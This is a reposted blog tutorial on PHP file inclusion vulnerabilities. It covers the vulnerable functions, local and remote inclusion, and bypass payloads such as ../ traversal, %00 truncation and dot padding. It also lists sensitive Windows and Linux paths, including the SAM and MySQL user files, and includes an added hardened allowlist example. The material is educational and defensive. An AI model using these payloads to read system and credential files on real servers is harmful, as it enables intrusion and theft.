File operation vulnerabilities: file inclusion (6)

2022-06-24 23:44:00 Key_ Words

Part 1: File inclusion

1. Basic concepts of file inclusion

Developers want flexible code, so the file to be included is often specified through a variable and loaded dynamically. That same flexibility lets a client cause a malicious file to be included, which creates a file inclusion vulnerability. File inclusion is either local or remote.

Typical signs
The value of a parameter is a page:
?page=a.php
?home=b.html
?file=content…

2. Prerequisites for exploiting file inclusion
(1) The web application uses include or another file inclusion function, and the path of the file to include is passed in through a user-supplied parameter;
(2) The user can control the parameter that names the included file, and the included file is accessible to the current page;

Common functions that lead to file inclusion:

PHP: include(), include_once(), require(), require_once(), etc.;
1. PHP file inclusion executes the code of the included file directly, and the format of the included file is not restricted in any way.
PHP provides four file inclusion functions:
(1) require: when the included file cannot be found, a fatal error (E_COMPILE_ERROR) is raised and the script stops;
(2) include: when the included file cannot be found, only a warning (E_WARNING) is raised and the script continues to execute;
(3) require_once: like include, it generates a warning; the difference is that if the file's code has already been included, it is not included again;

3. Conditions for obtaining a webshell through file inclusion:
(1) The attacker needs to know the physical path where the file is stored;
(2) There is execute permission on the directory where the uploaded file is located;
(3) A file inclusion vulnerability exists;

I. Local inclusion

1. Unrestricted

Same-directory access: http://127.0.0.1/include.php?filename=1.txt

Cross-directory access: http://127.0.0.1/include.php?filename=../../../www.txt

2. Restricted

Bypass approaches:

1. %00 truncation (conditions: magic_quotes_gpc = off, PHP version < 5.3.4)

For example: 1.txt%00

Principle: the trailing .html is truncated.

2. Length truncation (conditions: on Windows the dot sequence must be longer than 256; on Linux, longer than 4096)

For example:

1.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././.

/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

3. Dot bypass

1.txt................................................................................................................

Principle: (other symbols also work) once there are more than 256 of them, the restricting .html that follows can no longer be appended, and the system automatically strips the trailing symbols.

Part 2: Remote inclusion

Bypass methods

http://127.0.0.1/include.php?filename=1.txt%20

http://127.0.0.1/include.php?filename=1.txt%23

http://127.0.0.1/include.php?filename=1.txt?

and so on.
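
A hardened counterpart to the include.php?filename= pattern used in the examples above, as an added example that is not part of the original article: the client supplies a key rather than a path, so traversal sequences, truncation padding and remote URLs never reach the filesystem. The pages directory, the page keys and resolve_page() are assumptions made for illustration.

```php
<?php
// Added example, not from the original article.
// Weak pattern that the bypasses above target (shown only as a comment):
//   include $_GET['filename'] . '.html';

// Assumption: includable pages live in ./pages next to this script.
const PAGE_DIR = __DIR__ . '/pages';

// Assumption: hypothetical page keys; the client picks a key, never a path.
const PAGES = [
    'home'  => 'home.html',
    'about' => 'about.html',
];

/**
 * Map a client-supplied key to an absolute path inside PAGE_DIR,
 * or return null when the request must be rejected.
 */
function resolve_page(string $key): ?string
{
    // 1. Allowlist lookup: "../", "%00", long dot runs and URLs are just unknown keys.
    if (!array_key_exists($key, PAGES)) {
        return null;
    }
    // 2. Canonicalise and confirm containment, in case an allowlisted
    //    entry is later replaced by a symlink pointing outside PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . DIRECTORY_SEPARATOR . PAGES[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$key  = isset($_GET['filename']) && is_string($_GET['filename']) ? $_GET['filename'] : 'home';
$path = resolve_page($key);
if ($path === null) {
    http_response_code(404);
    exit('Not found');
}
// readfile() emits static content without executing it as PHP;
// use include only if the allowlisted files are trusted PHP templates.
readfile($path);
```

Keeping allow_url_include = Off in php.ini (its default) additionally prevents include from fetching remote URLs.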

Common sensitive paths:
1. Windows
C:\boot.ini // View the system version
C:\windows\system32\inetsrv\MetaBase.xml // IIS configuration file
C:\windows\repair\sam // Stores the password from the initial Windows installation
C:\Program Files\mysql\my.ini // MySQL configuration
C:\Program Files\mysql\data\mysql\user.MYD // MySQL root
C:\windows\php.ini // PHP configuration information
C:\windows\my.ini // MySQL configuration file

2. UNIX/Linux
/etc/passwd
/usr/local/app/apache2/conf/httpd.conf // Apache2 default configuration file
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf // Virtual host settings
/usr/local/app/php5/lib/php.ini // PHP-related configuration
/etc/httpd/conf/httpd.conf // Apache
/etc/php5/apache2/php.ini // Default path on Ubuntu

Part of this article is reprinted. Link to the original: https://blog.csdn.net/qq_39431542/article/details/88628225

Copyright notice
This article was written by [Key_ Words]. Please include a link to the original when reprinting. Thank you.
https://yzsam.com/2022/02/202202211117584509.html